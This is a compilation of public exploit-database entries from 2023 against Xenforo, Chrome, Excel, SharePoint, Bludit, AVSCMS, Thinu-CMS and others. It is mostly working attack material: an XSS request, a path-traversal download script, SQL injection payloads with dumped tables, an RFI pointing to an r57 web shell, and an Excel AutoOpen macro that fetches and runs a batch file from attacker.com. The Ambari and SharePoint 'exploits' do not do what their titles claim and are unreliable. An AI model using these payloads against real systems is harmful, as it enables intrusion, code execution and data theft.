<pre><code># Exploit Title: Azure Apache Ambari 2302250400 - Spoofing<br /># Date: 2023-06-23<br /># country: Iran<br /># Exploit Author: Amirhossein Bahramizadeh<br /># Category : Remote<br /># Vendor Homepage:<br /># Microsoft<br /># Apache Ambari<br /># Microsoft Azure HDInsight<br /># Tested on: Windows/Linux<br /># CVE : CVE-2023-23408<br /><br />import requests<br /><br /># Set the URL and headers for the Ambari web interface<br />url = "https://ambari.example.com/api/v1/clusters/cluster_name/services"<br />headers = {"X-Requested-By": "ambari", "Authorization": "Basic abcdefghijklmnop"}<br /><br /># Define a function to validate the headers<br />def validate_headers(headers):<br />    if "X-Requested-By" not in headers or headers["X-Requested-By"] != "ambari":<br />        return False<br />    if "Authorization" not in headers or headers["Authorization"] != "Basic abcdefghijklmnop":<br />        return False<br />    return True<br /><br /># Define a function to send a request to the Ambari web interface<br />def send_request(url, headers):<br />    if not validate_headers(headers):<br />        print("Invalid headers")<br />        return<br />    response = requests.get(url, headers=headers)<br />    if response.status_code == 200:<br />        print("Request successful")<br />    else:<br />        print("Request failed")<br /><br /># Call the send_request function with the URL and headers<br />send_request(url, headers)<br /><br /></code></pre>
<pre><code># Exploit Title: Xenforo Version 2.2.13 - Authenticated Stored XSS<br /># Date: 2023-06-24<br /># Exploit Author: Furkan Karaarslan<br /># Category : Webapps<br /># Vendor Homepage: https://x.com/admin.php?smilies<br /># Version: 2.2.12 (REQUIRED)<br /># Tested on: Windows/Linux<br /># CVE : <br /><br />-----------------------------------------------------------------------------<br />Requests<br /><br />POST /admin.php?smilie-categories/0/save HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0<br />Accept: application/json, text/javascript, */*; q=0.01<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Referer: http://127.0.0.1/admin.php?smilies/<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------333176689514537912041638543422<br />Content-Length: 1038<br />Origin: http://127.0.0.1<br />Connection: close<br />Cookie: xf_csrf=aEWkQ90jbPs2RECi; xf_session=yCLGXIhbOq9bSNKAsymJPWYVvTotiofa; xf_session_admin=wlr6UqjWxCkpfjKlngAvH5t-4yGiK5mQ<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />-----------------------------333176689514537912041638543422<br />Content-Disposition: form-data; name="_xfToken"<br /><br />1687616851,83fd2350307156281e51b17e20fe575b<br />-----------------------------333176689514537912041638543422<br />Content-Disposition: form-data; name="title"<br /><br /><img src=x onerror=alert(document.domain)><br />-----------------------------333176689514537912041638543422<br />Content-Disposition: form-data; name="display_order"<br /><br />1<br />-----------------------------333176689514537912041638543422<br />Content-Disposition: form-data; name="_xfRequestUri"<br /><br />/admin.php?smilies/<br />-----------------------------333176689514537912041638543422<br />Content-Disposition: form-data; name="_xfWithData"<br /><br />1<br 
/>-----------------------------333176689514537912041638543422<br />Content-Disposition: form-data; name="_xfToken"<br /><br />1687616849,b74724a115448b864ba2db8f89f415f5<br />-----------------------------333176689514537912041638543422<br />Content-Disposition: form-data; name="_xfResponseType"<br /><br />json<br />-----------------------------333176689514537912041638543422--<br /><br /><br />Response: After it is created, an alert comes immediately.<br /><br /></code></pre>
<pre><code># Exploit Title: MCL-Net 4.3.5.8788 - Information Disclosure<br /># Date: 5/31/2023<br /># Exploit Author: Victor A. Morales, GM Sectec Inc.<br /># Vendor Homepage: https://www.mcl-mobilityplatform.com/net.php<br /># Version: 4.3.5.8788 (other versions may be affected)<br /># Tested on: Microsoft Windows 10 Pro<br /># CVE: CVE-2023-34834<br /><br />Description:<br />Directory browsing vulnerability in MCL-Net version 4.3.5.8788 webserver running on default port 5080, allows attackers to gain sensitive information about the configured databases via the "/file" endpoint.<br /><br />Steps to reproduce:<br />1. Navigate to the webserver on default port 5080, where "Index of Services" will disclose directories, including the "/file" directory. <br />2. Browse to the "/file" directory and database entry folders configured<br />3. The "AdoInfo.txt" file will contain the database connection strings in plaintext for the configured database. Other files containing database information are also available inside the directory.<br /><br /></code></pre>
<pre><code>Chrome: Internal JavaScript object access via Origin Trials<br /><br />VULNERABILITY DETAILS<br />1. `JSObject::DefineAccessor` doesn't ensure that the receiver object is in a valid state before creating an accessor property. This allows callers to extend non-extensible objects and reconfigure non-configurable properties.<br />2. The function is reachable from `IDLMemberInstaller::InstallAttributes`:<br />```<br />IDLMemberInstaller::InstallAttributes -><br />InstallAttribute -><br />Object::SetAccessorProperty -><br />JSObject::DefineAccessor<br />```<br />3. When an origin trial is activated through a `meta` tag, `InstallAttributes` might be called on a JS object that has already been modified by the user code.<br />4. Some origin trials install attributes directly on the global object.<br /><br />To exploit the issue:<br /><br />1. Add a non-configurable property to the global object.<br />2. Compile a JS function that accesses the property. The compilation dependency in [1] will be skipped.<br />3. Enable an origin trial that redefines the property as configurable.<br />4. Delete the property.<br /><br />After that, the compiled function will reference an invalid property cell and leak the internal hole object. 
This is a known vulnerable condition that can be abused to execute arbitrary code.<br /><br />[1] https://source.chromium.org/chromium/chromium/src/+/refs/heads/main:v8/src/compiler/js-native-context-specialization.cc;drc=837cc12de25a288edf3ac222f7265c9936e69552;l=1164<br /><br /><br />VERSION<br />Google Chrome 112.0.5615.49 (Official Build) (arm64)<br />Chromium 114.0.5713.0 (Developer Build) (64-bit)<br /><br /><br />REPRODUCTION CASE<br />```<br /><body><br /><script><br />var container = [{}];<br />function trigger() { container[0] = documentPictureInPicture; }<br /><br />Reflect.defineProperty(<br />  globalThis,<br />  'documentPictureInPicture',<br />  { configurable: false, writable: true, value: {} });<br />documentPictureInPicture = {}; // Now `documentPictureInPicture` is a non-configurable mutable slot.<br />for (let i = 0; i < 50000; i++) trigger();<br /><br />// The "Document Picture-in-Picture" origin trial force-sets the `documentPictureInPicture` property<br />// on the global object.<br />meta = document.createElement('meta');<br />meta.httpEquiv = 'Origin-Trial';<br />meta.content =<br />  'AstD02iOsmKKlxPbuURr1i4CKzX6AhBpjqxCMNIinwFqsdNThmojsMI8B7m8GGlR/DNu9i6t4eqEfHvhuvSxHgQAAABe' +<br />  'eyJvcmlnaW4iOiJodHRwOi8vbG9jYWxob3N0OjgwMDAiLCJmZWF0dXJlIjoiRG9jdW1lbnRQaWN0dXJlSW5QaWN0dXJl' +<br />  'QVBJIiwiZXhwaXJ5IjoxNjk0MTMxMTk5fQ==';<br />document.head.appendChild(meta);<br /><br />delete documentPictureInPicture;<br />trigger();<br />container[0].prop; // Trying to access a property of the hole object should cause a crash.<br /></script><br /></body><br />```<br /><br /><br />CREDIT INFORMATION<br />Sergei Glazunov of Google Project Zero<br /><br /><br />This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. 
The scheduled deadline is 2023-07-13.<br /><br /><br />Related CVE Numbers: CVE-2023-2724.<br /><br /><br /><br />Found by: glazunov@google.com<br /><br /></code></pre>
<pre><code>// Exploit Title: Microsoft SharePoint Enterprise Server 2016 - Spoofing<br />// Date: 2023-06-20<br />// country: Iran<br />// Exploit Author: Amirhossein Bahramizadeh<br />// Category : Remote<br />// Vendor Homepage:<br />// Microsoft SharePoint Foundation 2013 Service Pack 1<br />// Microsoft SharePoint Server Subscription Edition<br />// Microsoft SharePoint Enterprise Server 2013 Service Pack 1<br />// Microsoft SharePoint Server 2019<br />// Microsoft SharePoint Enterprise Server 2016<br />// Tested on: Windows/Linux<br />// CVE : CVE-2023-28288<br /><br />#include <windows.h><br />#include <wininet.h> // InternetOpen, InternetConnect, HttpOpenRequest, ...<br />#include <stdio.h><br />#include <string.h> // strlen<br /><br />// Defined after main(), so it has to be declared before its first use<br />BOOL InternetReadFileUrl(const char *url, HANDLE file);<br /><br />// The vulnerable SharePoint server URL<br />const char *server_url = "http://example.com/";<br /><br />// The URL of the fake SharePoint server<br />const char *fake_url = "http://attacker.com/";<br /><br />// The vulnerable SharePoint server file name<br />const char *file_name = "vuln_file.aspx";<br /><br />// The fake SharePoint server file name<br />const char *fake_file_name = "fake_file.aspx";<br /><br />int main()<br />{<br /> HANDLE file;<br /> DWORD bytes_written;<br /> char file_contents[1024];<br /><br /> // Create the fake file contents<br /> sprintf(file_contents, "<html><head></head><body><p>This is a fake file.</p></body></html>");<br /><br /> // Write the fake file to disk<br /> file = CreateFile(fake_file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);<br /> if (file == INVALID_HANDLE_VALUE)<br /> {<br /> printf("Error creating fake file: %d\n", GetLastError());<br /> return 1;<br /> }<br /> if (!WriteFile(file, file_contents, strlen(file_contents), &bytes_written, NULL))<br /> {<br /> printf("Error writing fake file: %d\n", GetLastError());<br /> CloseHandle(file);<br /> return 1;<br /> }<br /> CloseHandle(file);<br /><br /> // Send a request to the vulnerable SharePoint server to download the file<br /> sprintf(file_contents, "%s%s", server_url, file_name);<br /> file = 
CreateFile(file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);<br /> if (file == INVALID_HANDLE_VALUE)<br /> {<br /> printf("Error creating vulnerable file: %d\n", GetLastError());<br /> return 1;<br /> }<br /> if (!InternetReadFileUrl(file_contents, file))<br /> {<br /> printf("Error downloading vulnerable file: %d\n", GetLastError());<br /> CloseHandle(file);<br /> return 1;<br /> }<br /> CloseHandle(file);<br /><br /> // Replace the vulnerable file with the fake file<br /> if (!DeleteFile(file_name))<br /> {<br /> printf("Error deleting vulnerable file: %d\n", GetLastError());<br /> return 1;<br /> }<br /> if (!MoveFile(fake_file_name, file_name))<br /> {<br /> printf("Error replacing vulnerable file: %d\n", GetLastError());<br /> return 1;<br /> }<br /><br /> // Send a request to the vulnerable SharePoint server to trigger the vulnerability<br /> sprintf(file_contents, "%s%s", server_url, file_name);<br /> if (!InternetReadFileUrl(file_contents, NULL))<br /> {<br /> printf("Error triggering vulnerability: %d\n", GetLastError());<br /> return 1;<br /> }<br /><br /> // Print a message indicating that the vulnerability has been exploited<br /> printf("Vulnerability exploited successfully.\n");<br /><br /> return 0;<br />}<br /><br />BOOL InternetReadFileUrl(const char *url, HANDLE file)<br />{<br /> HINTERNET internet, connection, request;<br /> DWORD bytes_read;<br /> char buffer[1024];<br /><br /> // Open an Internet connection<br /> internet = InternetOpen("Mozilla/5.0 (Windows NT 10.0; Win64; x64)", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);<br /> if (internet == NULL)<br /> {<br /> return FALSE;<br /> }<br /><br /> // Connect to the server<br /> connection = InternetConnect(internet, fake_url, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);<br /> if (connection == NULL)<br /> {<br /> InternetCloseHandle(internet);<br /> return FALSE;<br /> }<br /><br /> // Send the HTTP request<br /> request = 
HttpOpenRequest(connection, "GET", url, NULL, NULL, NULL, 0, 0);<br /> if (request == NULL)<br /> {<br /> InternetCloseHandle(connection);<br /> InternetCloseHandle(internet);<br /> return FALSE;<br /> }<br /> if (!HttpSendRequest(request, NULL, 0, NULL, 0))<br /> {<br /> InternetCloseHandle(request);<br /> InternetCloseHandle(connection);<br /> InternetCloseHandle(internet);<br /> return FALSE;<br /> }<br /><br /> // Read the response data<br /> while (InternetReadFile(request, buffer, sizeof(buffer), &bytes_read) && bytes_read > 0)<br /> {<br /> if (file != NULL)<br /> {<br /> // Write the data to disk<br /> if (!WriteFile(file, buffer, bytes_read, &bytes_read, NULL))<br /> {<br /> InternetCloseHandle(request);<br /> InternetCloseHandle(connection);<br /> InternetCloseHandle(internet);<br /> return FALSE;<br /> }<br /> }<br /> }<br /><br /> InternetCloseHandle(request);<br /> InternetCloseHandle(connection);<br /> InternetCloseHandle(internet);<br /> return TRUE;<br />}<br /> <br /><br /></code></pre>
<pre><code>## Title: Microsoft Excel Microsoft® Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 32-bit Remote Code Execution Vulnerability<br />## Author: nu11secur1ty<br />## Date: 06.27.2023<br />## Vendor: https://www.microsoft.com/<br />## Software: https://www.microsoft.com/en-us/microsoft-365/excel<br />## Reference: https://portswigger.net/daily-swig/rce<br />## CVE-2023-33137<br /><br /><br />## Description:<br />This exploit is connected to a third-party exploit server, which waits<br />for the victim to call it and execute the content from it using the<br />pipe posting method! This is absolutely a 0-day exploit! This is<br />absolutely dangerous for the victims who are infected by it!<br />When the victim hits the button in the Excel file, it makes a POST<br />request to the exploit server, and the server responds as follows:<br />it creates another hidden malicious file and executes it directly<br />on the victim's machine, then everything disappears, so<br />nasty.<br /><br />STATUS: HIGH Vulnerability WARNING: THIS IS VERY DANGEROUS for ordinary users!<br /><br />[+]Exploit:<br />```vbs<br />Sub AutoOpen()<br /> Call Shell("cmd.exe /S /c" & "curl -s<br />https://attacker.com/nu11secur1ty/somwhere/ontheinternet/maloumnici.bat<br />> maloumnici.bat && .\maloumnici.bat", vbNormalFocus)<br />End Sub<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33137)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/06/microsoft-excel-microsoft-365-mso.html)<br /><br />## Time spent:<br />01:27:00<br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html<br />https://cxsecurity.com/ and https://www.exploit-db.com/<br />0day Exploit DataBase https://0day.today/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Adult Video Script 8.2 RFI/LFI Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) |<br />| # Download : https://update.avscms.com/files/avscms-8.2-full.zip |<br />| # Dork : Powered by AVSCMS |<br />====================================================================================================================================<br /><br />PoC :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] R/L File Inclusion :<br /><br /> Line : 20 = include_once ('./lang/'.$lang_include);<br /> Function : include_once<br /> Variables : $lang_include<br /> C:\web\www\upload\siteadmin\editor_files\image.php<br /><br />[+] http://127.0.0.1/www/lustubecom/siteadmin/editor_files/image.php?lang_include=http://www.dcvi.net/r57.txt?<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Active Matrimonial CMS v 1.5 HTML Injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |<br />| # Vendor : https://activeitzone.com/demo/matrimonial_v1.5/ |<br />| # Dork : "Active Matrimonial CMS - All Rights Reserved " |<br />====================================================================================================================================<br /><br /><br />PoC :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Register a new member.<br /><br />[+] Go to edit your profile: https://127.0.0.1/activeitzonecom/demo/matrimonial_v1.5/home/profile<br /><br />[+] In the Introduction box, put your code or use this code for testing:<br /><br /><marquee><font color=lime size=32>Hacked by indoushka</font></marquee><br /></tr><br /><td align="center"><a href="https://cxsecurity.com/author/indoushka/1/"><img src="https://cert.cx/cxstatic/images/12018/cxseci.png" alt="" width="650" height="120" border="0"></a><br /></tr><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh |<br />=======================================================================================================================================<br /></code></pre>
<pre><code># -*- coding: utf-8 -*-<br />#/usr/bin/env python<br /><br /># Exploit Title: Bludit < 3.13.1 Backup Plugin - Arbitrary File Download (Authenticated)<br /># Date: 2022-07-21<br /># Exploit Author: Antonio Cuomo (arkantolo)<br /># Vendor Homepage: https://www.bludit.com<br /># Software Link: https://github.com/bludit/bludit<br /># Version: < 3.13.1<br /># Tested on: Debian 10 - PHP Version: 7.3.14<br /><br />import requests<br />import argparse<br />from bs4 import BeautifulSoup #pip3 install beautifulsoup4<br /><br />def main():<br />    parser = argparse.ArgumentParser(description='Bludit < 3.13.1 - Backup Plugin - Arbitrary File Download (Authenticated)')<br />    parser.add_argument('-x', '--url', type=str, required=True)<br />    parser.add_argument('-u', '--user', type=str, required=True)<br />    parser.add_argument('-p', '--password', type=str, required=True)<br />    parser.add_argument('-f', '--file', type=str, required=True)<br />    args = parser.parse_args()<br />    print("\nBludit < 3.13.1 - Backup Plugin - Arbitrary File Download (Authenticated)","\nExploit Author: Antonio Cuomo (Arkantolo)\n")<br />    exploit(args)<br /><br />def exploit(args):<br />    s2 = requests.Session()<br /><br />    url = args.url.rstrip("/")<br /><br />    #get csrf token<br />    r = s2.get(url+'/admin/')<br />    soup = BeautifulSoup(r.text, 'html.parser')<br />    formtoken = soup.find('input', {'name':'tokenCSRF'})['value']<br /><br />    #login<br />    body= {'tokenCSRF':formtoken,'username':args.user,'password':args.password}<br />    r = s2.post(url+'/admin/', data=body, allow_redirects=False)<br />    if(r.status_code==301 and r.headers['location'].find('/admin/dashboard') != -1):<br />        print("[*] Login OK")<br />    else:<br />        print("[*] Login Failed")<br />        exit(1)<br /><br />    #arbitrary download<br />    r = s2.get(url+'/plugin-backup-download?file=../../../../../../../../'+args.file)<br />    if(r.status_code==200 and len(r.content)>0):<br />        print("[*] File:")<br />        print(r.text)<br />    else:<br />        print("[*] Exploit Failed")<br />        exit(1)<br /><br />if __name__ == '__main__':<br />    main()<br /><br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://www.codester.com/items/40401/ │<br />│ Vendor : Thinu Tech │<br />│ Software : Thinu-CMS Blog System 1.5 │<br />│ Vuln Type: SQL Injection │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │<br />│ data and crash the application or make it unavailable, leading to lost revenue and │<br />│ damage to a company's reputation. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. 
SQL, MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /category.php<br /><br />http://website/category.php?cat_id=[SQLI]<br /><br /><br />GET parameter 'cat_id' is vulnerable to SQL Injection<br /><br />---<br />Parameter: cat_id (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: cat_id=3 AND 7897=7897<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: cat_id=3 OR (SELECT 8233 FROM(SELECT COUNT(*),CONCAT(0x7171766a71,(SELECT (ELT(8233=8233,1))),0x716a767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: cat_id=3 AND (SELECT 1981 FROM (SELECT(SLEEP(5)))lKbu)<br />---<br /><br /><br />[+] Starting the Attack<br /><br />fetching current database<br />current database: 'epiz_***50***_cms'<br /><br /><br />fetching tables<br /><br />[10 tables]<br />+----------------+<br />| ad_providers |<br />| advertisements |<br />| categories |<br />| contacts |<br />| navigation |<br />| posts |<br />| reports |<br />| settings |<br />| users |<br />| users_online |<br />+----------------+<br /><br /><br />fetching columns from Table 'users'<br /><br />[16 columns]<br />+----------------+--------------+<br />| Column | Type |<br />+----------------+--------------+<br />| about | text |<br />| cover_image | text |<br />| token | text |<br />| user_email | varchar(255) |<br />| user_facebook | text |<br />| user_firstname | varchar(255) |<br />| user_id | int(255) |<br />| user_image | text |<br />| user_instagram | text |<br />| user_job | 
varchar(255) |<br />| user_lastname | varchar(255) |<br />| user_password | varchar(255) |<br />| user_role | varchar(255) |<br />| user_twitter | text |<br />| user_website | text |<br />| username | varchar(255) |<br />+----------------+--------------+<br /><br /><br />[-] Done<br /></code></pre>
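The three PHP web-application advisories above (AVSCMS `lang_include`, Bludit `plugin-backup-download?file=`, Thinu-CMS `cat_id`) each leave a distinctive request line, so affected hosts can be checked by scanning web-server access logs. The following is an added example, not code from any of the advisories; the combined log format, the sample entries and every function name are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request part of an Apache/nginx "combined" access-log entry (assumed format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so nested encoding cannot hide '../'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def has_parent_step(value):
    """True if any path segment is '..' (either slash style)."""
    return ".." in value.replace("\\", "/").split("/")

def is_remote_or_parent(value):
    # include_once('./lang/' . $lang_include) should only receive a bare
    # file name, so a URL scheme or a '..' segment is never legitimate.
    return "://" in value or has_parent_step(value)

def is_not_integer(value):
    # Assumption: cat_id is a numeric category id (the page shows cat_id=3).
    return re.fullmatch(r"[0-9]+", value) is None

# (rule name, path suffix, parameter, predicate on the decoded value)
RULES = [
    ("file-inclusion", "/siteadmin/editor_files/image.php",
     "lang_include", is_remote_or_parent),
    ("path-traversal", "/plugin-backup-download", "file", has_parent_step),
    ("non-integer-id", "/category.php", "cat_id", is_not_integer),
]

def scan(lines):
    """Return (line number, client, rule, status, decoded value) tuples."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if m is None:
            continue  # not a combined-format request line
        try:
            url = urlsplit(m["target"])
        except ValueError:
            continue  # malformed request target
        params = parse_qsl(url.query, keep_blank_values=True)
        for rule, suffix, param, predicate in RULES:
            if not url.path.endswith(suffix):
                continue
            for name, raw in params:
                value = fully_decode(raw)
                if name == param and predicate(value):
                    findings.append(
                        (lineno, m["ip"], rule, int(m["status"]), value))
    return findings

# Constructed sample log (documentation-range addresses, invented sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jul/2023:10:00:01 +0000] "GET /category.php?cat_id=3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jul/2023:10:00:05 +0000] "GET /category.php?cat_id=3%20AND%207897%3D7897 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jul/2023:10:01:12 +0000] "GET /siteadmin/editor_files/image.php?lang_include=http://files.example/x.txt%3F HTTP/1.1" 200 312',
    '203.0.113.5 - - [01/Jul/2023:10:02:40 +0000] "GET /plugin-backup-download?file=..%2F..%2F..%2Fetc%2Fhostname HTTP/1.1" 200 18',
    '192.0.2.10 - - [01/Jul/2023:10:03:00 +0000] "GET /plugin-backup-download?file=backup-2023-07-01.zip HTTP/1.1" 200 90211',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 200 status on a finding means the request was served and the response size is worth comparing against a normal page; a match on its own only shows that the pattern was requested.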